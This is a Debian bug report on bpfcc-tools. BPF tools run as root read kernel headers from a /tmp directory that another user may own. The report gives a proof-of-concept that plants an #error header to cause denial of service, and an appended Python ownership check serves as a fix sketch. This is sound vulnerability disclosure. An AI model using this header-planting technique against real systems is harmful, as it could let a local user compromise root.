Package: bpfcc-tools
Version: 0.25.0+ds-1
Tags: security

If kernel headers are not installed in the usual place, the BPF tools try to look them up in /tmp/kheaders-$(uname -r)/, even when this directory is owned by another user.

This can be exploited for denial of service, or likely something worse.

To reproduce, run this as a normal user:

   $ mkdir /tmp/kheaders-$(uname -r)/
   $ mkdir -p /tmp/kheaders-$(uname -r)/include/linux/
   $ echo "#error this header is malicious" > /tmp/kheaders-$(uname -r)/include/linux/kconfig.h

Then run this as root:

   # opensnoop-bpfcc
   In file included from <built-in>:1:
   ././include/linux/kconfig.h:1:2: error: this header is malicious
   #error this header is malicious
    ^
   In file included from <built-in>:2:
   /virtual/include/bcc/bpf.h:12:10: fatal error: 'linux/types.h' file not found
   #include <linux/types.h>
            ^~~~~~~~~~~~~~~
   2 errors generated.
   Traceback (most recent call last):
     File "/usr/sbin/opensnoop-bpfcc", line 261, in <module>
       b = BPF(text='')
           ^^^^^^^^^^^^
     File "/usr/lib/python3/dist-packages/bcc/__init__.py", line 476, in __init__
       raise Exception("Failed to compile BPF module %s" % (src_file or "<text>"))
   Exception: Failed to compile BPF module <text>

-- System Information:
Debian Release: bookworm/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 6.1.0-1-amd64 (SMP w/1 CPU thread; PREEMPT)
Locale: LANG=C.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages bpfcc-tools depends on:
ii  python3          3.11.1-1
ii  python3-bpfcc    0.25.0+ds-1
ii  python3-netaddr  0.8.0-2

-- 
Jakub Wilk
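
A sketch of the ownership check whose absence the report above describes, as an added example that is not part of the original report or of bcc's code. The function name `kheaders_dir_is_trusted` and the temporary directories it is run against are constructed for illustration.

```python
import os
import stat
import tempfile


def kheaders_dir_is_trusted(path, trusted_uid=0):
    """True only for a real directory owned by trusted_uid that neither
    group nor others can write to. trusted_uid=0 means root."""
    try:
        st = os.lstat(path)  # lstat: a symlink planted in /tmp is not followed
    except OSError:
        return False  # missing or unreadable: treat as "no headers here"
    if not stat.S_ISDIR(st.st_mode):
        return False
    if st.st_uid != trusted_uid:
        return False  # the case in this report: directory made by another user
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False  # owner is fine, but others could still add headers
    return True


def demo():
    """Run the check over constructed directories in a private temp dir."""
    me = os.geteuid()
    with tempfile.TemporaryDirectory() as base:
        good = os.path.join(base, "kheaders-good")
        loose = os.path.join(base, "kheaders-loose")
        link = os.path.join(base, "kheaders-link")
        os.mkdir(good)
        os.chmod(good, 0o755)
        os.mkdir(loose)
        os.chmod(loose, 0o777)
        os.symlink(good, link)
        return {
            "owned_by_trusted_uid": kheaders_dir_is_trusted(good, me),
            "owned_by_other_uid": kheaders_dir_is_trusted(good, me + 1),
            "world_writable": kheaders_dir_is_trusted(loose, me),
            "symlink": kheaders_dir_is_trusted(link, me),
            "missing": kheaders_dir_is_trusted(os.path.join(base, "absent"), me),
        }


if __name__ == "__main__":
    for case, trusted in demo().items():
        print(f"{case}: {'use' if trusted else 'ignore'}")
```

The demo passes the caller's own uid as `trusted_uid` so it runs unprivileged; a tool running as root would keep the default of 0.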